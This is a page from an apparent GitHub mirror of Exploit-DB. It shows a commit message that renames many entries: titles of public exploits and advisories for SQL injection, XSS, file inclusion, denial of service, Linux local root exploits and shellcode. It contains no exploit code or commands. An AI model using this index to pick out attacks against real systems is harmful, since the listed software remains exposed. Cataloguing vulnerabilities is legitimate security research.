bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40192.py
Offensive Security 1b40ae09d7 DB: 2016-08-02 
4 new exploits

ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit
ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit
Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)
Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)

Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)

Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)

Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Local Root Exploit (2)

Symantec Multiple Firewall DNS Response Denial of Service
Symantec Multiple Firewall - DNS Response Denial of Service

Lexmark Multiple HTTP Servers Denial of Service
Lexmark Multiple HTTP Servers - Denial of Service

BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit
BadBlue 2.52 Web Server - Multiple Connections Denial of Service Exploit

Linux Kernel 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit
Linux Kernel 2.4.28 / 2.6.9 - scm_send Local DoS Exploit
Linux Kernel 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit
Linux Kernel 2.6.9 / <= 2.4.28 - Memory Leak Local DoS
Linux Kernel 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow
Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Exploit
Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local DoS
Linux Kernel 2.4.28 / 2.6.9 - ip_options_get Local Overflow

Linux Kernel 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit
Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit

WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits
WebWiz Products 1.0 / 3.06 - Login Bypass SQL Injection Exploits

Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit

Fast Click 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit
Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion Exploit

Newsscript 0.5 - Remote and Local File Inclusion
Newsscript 0.5 - Remote File Inclusion / Local File Inclusion

Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (linux)
Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (Linux)

X-Cart ? Multiple Remote File Inclusion
X-Cart - Multiple Remote File Inclusion

Rayzz Script 2.0 - Remote / Local File Inclusion
Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion

QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities
QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities

LookStrike Lan Manager 0.9 - Remote / Local File Inclusion
LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion

CMS WebManager-Pro Multiple SQL Injection
CMS WebManager-Pro - Multiple SQL Injection

Facil-CMS 0.1RC Multiple Local File Inclusion
Facil-CMS 0.1RC - Multiple Local File Inclusion

Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit
Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit

Nuked-klaN 1.7.7 / <= SP4.4 - Multiple Vulnerabilities
Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities

CafeEngine Multiple SQL Injection
CafeEngine - Multiple SQL Injection

A-Link WL54AP3 and WL54AP2 - CSRF + XSS
A-Link WL54AP3 and WL54AP2 - CSRF / XSS

GS Real Estate Portal Multiple SQL Injection
GS Real Estate Portal - Multiple SQL Injection

FloSites Blog Multiple SQL Injection
FloSites Blog - Multiple SQL Injection

ASP PORTAL Multiple SQL Injection
ASP PORTAL - Multiple SQL Injection

Simple Machines Forum 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass
Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass

Pligg 9.9.5 - CSRF Protection Bypass and Captcha Bypass
Pligg 9.9.5 - CSRF Protection Bypass / Captcha Bypass

Demium CMS 0.2.1b - Multiple Vulnerabilities and Exploit
Demium CMS 0.2.1b - Multiple Vulnerabilities

Linux Kernel 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit
Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit

AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (seh)
AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (SEH)

Linux Kernel 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

jetty 6.x < 7.x - XSS & Information Disclosure & Injection
jetty 6.x < 7.x - XSS / Information Disclosure / Injection

OpenDocMan 1.2.5 - XSS & SQL injection
OpenDocMan 1.2.5 - XSS / SQL injection

Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities
Alteon OS BBI (Nortell) - XSS / CSR

Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection
Micronet SP1910 Data Access Controller UI - XSS / HTML Code Injection

Kide Shoutbox 0.4.6 - XSS & AXFR
Kide Shoutbox 0.4.6 - XSS / AXFR

PHP-Nuke 8.0 - XSS & HTML Code Injection in News Module
PHP-Nuke 8.0 - XSS / HTML Code Injection in News Module

Invision Power Board 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI / SQL Injection
Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - LFI / SQL Injection

oBlog - Persistant XSS & CSRF & Admin Bruteforce
oBlog - Persistant XSS / CSRF / Admin Bruteforce

WP-Forum 2.3 - SQL Injection & Blind SQL Injection
WP-Forum 2.3 - SQL Injection / Blind SQL Injection

QuickEStore 7.9 - SQL Injection and Path Diclosure Download
QuickEStore 7.9 - SQL Injection / Path Diclosure Download

dotProject 2.1.3 - XSS and Improper Permissions
dotProject 2.1.3 - XSS / Improper Permissions

MOJO's IWms 7 SQL Injection & Cross-Site Scripting
MOJO's IWms 7 - SQL Injection / Cross-Site Scripting

Cisco Collaboration Server 5 - XSS & Source Code Disclosure
Cisco Collaboration Server 5 - XSS / Source Code Disclosure

cPanel Multiple CSRF Vulnerabilities
cPanel - Multiple CSRF Vulnerabilities

(Tod Miller's) Sudo/SudoEdit  <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit
(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Local Root Exploit

SiteDone Custom Edition 2.0 - SQL Injection & XSS
SiteDone Custom Edition 2.0 - SQL Injection / XSS

TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection & XSS
TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection / XSS

Centreon IT & Network Monitoring 2.1.5 - Injection SQL
Centreon IT & Network Monitoring 2.1.5 - SQL Injection

ilchClan 1.0.5 - (cid) SQL Injection & Exploit
ilchClan 1.0.5 - (cid) SQL Injection

joelz bulletin board 0.9.9rc3 - Multiple SQL Injection & Exploit
joelz bulletin board 0.9.9rc3 - Multiple SQL Injection

2DayBiz Advanced Poll Script - XSS and Authentication Bypass
2DayBiz Advanced Poll Script - XSS / Authentication Bypass

Socialware 2.2 - Upload and XSS
Socialware 2.2 - Upload / XSS

Waibrasil Remote / Local File Inclusion
Waibrasil - Remote File Inclusion / Local File Inclusion

I-Vision CMS - XSS & SQL Injection
I-Vision CMS - XSS / SQL Injection

phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting and Full Path
phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path

3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws
3Com* iMC (Intelligent Management Center) - XSS / Information Disclosure Flaws
WmsCMS - XSS & SQL Injection
iScripts eSwap 2.0 - SQLi and XSS
WmsCMS - XSS / SQL Injection
iScripts eSwap 2.0 - SQLi / XSS
reVou Twitter Clone 2.0 Beta - SQL Injection and XSS
JForum 2.1.8 bookmarks CSRF & XSS
reVou Twitter Clone 2.0 Beta - SQL Injection / XSS
JForum 2.1.8 bookmarks CSRF / XSS
eLms Pro - SQLi and XSS
PGAUTOPro - SQLi and XSS
eLms Pro - SQLi / XSS
PGAUTOPro - SQLi / XSS

Joomla 1.5 Jreservation Component - SQLi And XSS
Joomla 1.5 Jreservation Component - SQLi / XSS

Science Fair In A Box - SQLi & XSS
Science Fair In A Box - SQLi / XSS

PHP Property Rental Script - SQLi & XSS
PHP Property Rental Script - SQLi / XSS

SchoolMation 2.3 - SQLi and XSS
SchoolMation 2.3 - SQLi / XSS

UTStats - XSS & SQL Injection & Full path disclosure
UTStats - XSS / SQL Injection / Full path disclosure

SimpleAssets Authentication Bypass & XSS
SimpleAssets Authentication Bypass / XSS

InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation
InterScan Web Security 5.0 - Arbitrary File Upload / Local Privilege Escalation

ARSC Really Simple Chat 3.3 - Remote File Inclusion & XSS
ARSC Really Simple Chat 3.3 - Remote File Inclusion / XSS

Pre Multi-Vendor Shopping Malls SQL Injection & Auth Bypass
Pre Multi-Vendor Shopping Malls SQL Injection / Auth Bypass

Zylone IT Multiple Blind SQL Injection
Zylone IT - Multiple Blind SQL Injection

vBulletin 3.8.4 & 3.8.5 Registration Bypass
vBulletin 3.8.4 / 3.8.5 Registration Bypass

JaWiki 'versionNo' Parameter Cross Site Scripting
JaWiki 'versionNo' Parameter Cross-Site Scripting

411cc Multiple SQL Injection
411cc - Multiple SQL Injection

MantisBT 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure
MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Path Disclosure

OpenEMR 3.2.0 - SQL Injection and XSS
OpenEMR 3.2.0 - SQL Injection / XSS
F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities
phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities
F3Site 2011 alfa 1 - (XSS / CSRF) Multiple Vulnerabilities
phpMySport 1.4 - SQLi / Auth Bypass / Path Disclosure

WordPress Plugin BackWPup - Remote and Local Code Execution
WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution

Planex Mini-300PU & Mini100s Cross-Site Scripting
Planex Mini-300PU & Mini100s - Cross-Site Scripting

TinyBB 1.4 - Blind SQL Injection and Path Disclosure
TinyBB 1.4 - Blind SQL Injection / Path Disclosure

Linux Kernel 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit
Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Local Root Exploit

If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit  (Metasploit) (2)
If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2)

Webcat Multiple Blind SQL Injection
Webcat - Multiple Blind SQL Injection

Banana Dance CMS and Wiki SQL Injection
Banana Dance CMS and Wiki - SQL Injection

SMF 2.0.1 - SQL Injection & Privilege Escalation
SMF 2.0.1 - SQL Injection / Privilege Escalation

Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_  without password to /etc/passwd
Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd

Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities

phpList 2.10.17 - SQL Injection and XSS
phpList 2.10.17 - SQL Injection / XSS

vBshop Multiple Persistent XSS Vulnerabilities
vBshop - Multiple Persistent XSS Vulnerabilities

ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection
ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection

Serendipity 1.6 - Backend XSS And SQLi
Serendipity 1.6 - Backend XSS / SQLi

Wireshark Multiple Dissector Denial of Service Vulnerabilities
Wireshark - Multiple Dissector Denial of Service Vulnerabilities

Useresponse 1.0.2 - Privilege Escalation & RCE Exploit
Useresponse 1.0.2 - Privilege Escalation / RCE Exploit

Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options
Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options
AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection
Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection
AlienVault OSSIM 3.1 - Reflected XSS / Blind SQL Injection
Spiceworks 5.3.75941 - Stored XSS / Post-Auth SQL Injection

T-dah Webmail CSRF & Stored XSS
T-dah Webmail - CSRF / Stored XSS

XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload
XODA Document Management System 0.4.5 - XSS / Arbitrary File Upload

WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0Day)
WireShark 1.8.2 / 1.6.0 - Buffer Overflow PoC (0Day)

businesswiki 2.5rc3 - Stored XSS & arbitrary file upload
businesswiki 2.5rc3 - Stored XSS / arbitrary file upload

SpyNet 6.5 Chat Server Multiple Connection Denial of Service
SpyNet 6.5 Chat Server - Multiple Connection Denial of Service

Exploit: NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)
NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)

Mozilla Bonsai Multiple Cross-Site Scripting Vulnerabilities
Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities

airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection
airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection

BRS WebWeaver 1.0 4 POST and HEAD Denial of Service
BRS WebWeaver 1.0 4 - POST and HEAD Denial of Service

Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

MyDms 1.4 - SQL Injection And Directory Traversal
MyDms 1.4 - SQL Injection / Directory Traversal

D-Link DIR-600 and DIR-300 - (rev B) Multiple Vulnerabilities
D-Link DIR-600 and DIR-300 (rev B) - Multiple Vulnerabilities

D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A Multiple Vulnerabilities
D'Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities

Linux Kernel 2.6.x (RHEL4 <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root (2)
Linux Kernel 2.6.9 /2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root (2)

Linux Kernel 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root
Linux Kernel 2.4.30 / 2.6.11.5 - Bluetooth bluez_sock_create Local Root

CKEditor < 4.1 - Persistent XSS WYSIWYG module Drupal 6.x & 7.x
CKEditor < 4.1WYSIWYG module Drupal 6.x & 7.x - Persistent XSS

OSTicket 1.2/1.3 - Multiple Input Validation and Remote Code Injection Vulnerabilities
OSTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities
Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
MyBB - Multiple Cross-Site Scripting and SQL Injection
Calendarix 0.8.20071118 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
MyBB - Multiple Cross-Site Scripting / SQL Injection

YaPiG 0.9x - Remote and Local File Inclusion
YaPiG 0.9x - Remote File Inclusion / Local File Inclusion

ATutor 1.4.3 tile.php Multiple Parameter XSS
ATutor 1.4.3 - tile.php Multiple Parameter XSS

CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 menu_header.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 menu_tema.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - menu_header.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - menu_tema.php Multiple Parameter XSS

CarLine Forum Russian Board 4.2 reply.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - reply.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 edit_msg.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - new.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - edit_msg.php Multiple Parameter XSS

CarLine Forum Russian Board 4.2 reply_in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 memory.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 line.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 enter.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection

ASPNuke 0.80 register.asp Multiple Parameter XSS
ASPNuke 0.80 - register.asp Multiple Parameter XSS
Binary Board System 0.2.5 reply.pl Multiple Parameter XSS
Binary Board System 0.2.5 stats.pl Multiple Parameter XSS
Binary Board System 0.2.5 - reply.pl Multiple Parameter XSS
Binary Board System 0.2.5 - stats.pl Multiple Parameter XSS

ZixForum 1.12 Forum.ASP Multiple SQL Injection
ZixForum 1.12 - Forum.ASP Multiple SQL Injection

QNX 6.2/6.3 - Multiple Local Privilege Escalation and Denial of Service Vulnerabilities
QNX 6.2/6.3 - Multiple Local Privilege Escalation / Denial of Service Vulnerabilities

Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS
Web-APP.net WebAPP 0.9.x - index.cgi Multiple Parameter XSS

IntelliLink Pro 5.06 edit.cgi Multiple Parameter XSS
IntelliLink Pro 5.06 - edit.cgi Multiple Parameter XSS
xFlow 5.46.11 index.cgi Multiple Parameter SQL Injection
xFlow 5.46.11 index.cgi Multiple Parameter XSS
xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection
xFlow 5.46.11 - index.cgi Multiple Parameter XSS

zenphoto 0.9/1.0 index.php Multiple Parameter XSS
zenphoto 0.9/1.0 - index.php Multiple Parameter XSS

ATutor 1.5.x create_course.php Multiple Parameter XSS
ATutor 1.5.x - create_course.php Multiple Parameter XSS

BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities
BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities

Apache HTTP Server 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness
Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Weakness

WWWThreads 5.4 Cat Parameter Multiple Cross-Site Scripting Vulnerabilities
WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities

AckerTodo 4.2 Login.php Multiple SQL Injection
AckerTodo 4.2 - Login.php Multiple SQL Injection
ac4p Mobile index.php Multiple Parameter XSS
ac4p Mobile MobileNews.php Multiple Parameter XSS
ac4p Mobile - index.php Multiple Parameter XSS
ac4p Mobile - MobileNews.php Multiple Parameter XSS

ac4p Mobile up.php Multiple Parameter XSS
ac4p Mobile - up.php Multiple Parameter XSS

AShop Deluxe 4.5 ashop/catalogue.php Multiple Parameter XSS
AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter XSS

AShop Deluxe 4.5 shipping.php Multiple Parameter XSS
AShop Deluxe 4.5 - shipping.php Multiple Parameter XSS

212cafeBoard Multiple Cross-Site Scripting Vulnerabilities
212cafeBoard - Multiple Cross-Site Scripting Vulnerabilities

Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Inclusion
Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion

Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.php Multiple Input Validation Vulnerabilities
Atom PhotoBlog 1.0.1/1.0.9 - AtomPhotoBlog.php Multiple Input Validation Vulnerabilities

PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass and Multiple SQL Injection
PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection

WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure
WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure

ACG News 1.0 index.php Multiple SQL Injection
ACG News 1.0 - index.php Multiple SQL Injection

Add a link 4 - Security Bypass and SQL Injection
Add a link 4 - Security Bypass / SQL Injection

AlienVault OSSIM SQL Injection and Remote Code Execution
AlienVault OSSIM - SQL Injection / Remote Code Execution

bttlxe Forum 2.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
bttlxe Forum 2.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Neuron News 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Clever Copy 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection
Cells Blog 3.3 - XSS Reflected / Blind SQLite Injection

ProjectPier 0.8 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

MyBlog 1.x - SQL Injection and Remote File Inclusion
MyBlog 1.x - SQL Injection / Remote File Inclusion

PHP Classifieds 6.20 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities
PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities

Kloxo - SQL Injection and Remote Code Execution
Kloxo - SQL Injection / Remote Code Execution

PHP Address Book 3.1.5 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
PHP Address Book 3.1.5 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting and Arbitrary File Upload
GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload

couponPHP CMS 1.0 - Multiple Stored XSS and SQL Injection
couponPHP CMS 1.0 - Multiple Stored XSS / SQL Injection
EasyDynamicPages 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities
EasyDynamicPages 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting

EasyE-Cards 3.10 - (SQL Injection and Cross-Site Scripting) Multiple Vulnerabilities
EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities

dotProject 2.1.2 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
dotProject 2.1.2 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities
@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting

DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

KDE Konqueror 4.1 - Multiple Cross-Site Scripting and Denial of Service Vulnerabilities
KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities

4CMS - SQL Injection and Local File Inclusion
4CMS - SQL Injection / Local File Inclusion

PTCeffect 4.6 - LFI & SQL Injection
PTCeffect 4.6 - LFI / SQL Injection

010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities
010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities

DWebPro 6.8.26 - Directory Traversal and Arbitrary File Disclosure
DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure

Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution
Kingsoft Webshield 1.1.0.62 - Cross-Site scripting / Remote Command Execution

LxBlog Multiple Cross-Site Scripting and SQL Injection
LxBlog Multiple Cross-Site Scripting / SQL Injection

Joomla! < 1.5.11 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting and SQL Injection
PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting / SQL Injection

Natychmiast CMS - Multiple Cross-Site Scripting and SQL Injection
Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection

e107 0.7.x - ('CAPTCHA' Security Bypass and Cross-Site Scripting) Multiple Vulnerabilities
e107 0.7.x - ('CAPTCHA' Security Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Achievo 1.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection
Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection

Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities
Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities

Oracle E-Business Suite 11i Multiple Remote Vulnerabilities
Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities

Photokorn 1.542 - Cross-Site Scripting and Remote File Inclusion
Photokorn 1.542 - Cross-Site Scripting / Remote File Inclusion

dotProject 2.1.3 - Multiple SQL Injection and HTML Injection Vulnerabilities
dotProject 2.1.3 - Multiple SQL Injection / HTML Injection Vulnerabilities

Linux Kernel 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)
Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)

Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting and SQL Injection
Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection

Lunar CMS 3.3 - CSRF And Stored XSS
Lunar CMS 3.3 - CSRF / Stored XSS

NovaSTOR NovaNET 11.0 - Remote DoS and arbitrary memory read
NovaSTOR NovaNET 11.0 - Remote DoS / arbitrary memory read

NolaPro Enterprise 4.0.5538 - Cross-Site Scripting and SQL Injection
NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection

Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting and SQL Injection
Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection

Omeka 2.2 - CSRF And Stored XSS
Omeka 2.2 - CSRF / Stored XSS

Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities
Oxwall 1.7.0 - Multiple CSRF / HTML Injection Vulnerabilities

SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities
SkaDate Lite 2.0 - Multiple CSRF / Persistent XSS Vulnerabilities

Disqus for WordPress 2.7.5 - Admin Stored CSRF and XSS
Disqus for WordPress 2.7.5 - Admin Stored CSRF / XSS

PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities
PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities

Cetera eCommerce Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Allinta CMS 22.07.2010 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Allinta CMS 22.07.2010 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Nagios XI Multiple Cross-Site Request Forgery Vulnerabilities
Nagios XI 0 Multiple Cross-Site Request Forgery Vulnerabilities

JBoard Multiple Cross-Site Scripting and SQL Injection
JBoard Multiple Cross-Site Scripting / SQL Injection

ServletExec - (Directory Traversal and Authentication-Bypass) Multiple Vulnerabilities
ServletExec - (Directory Traversal / Authentication-Bypass) Multiple Vulnerabilities

123 Flash Chat Multiple Security Vulnerabilities
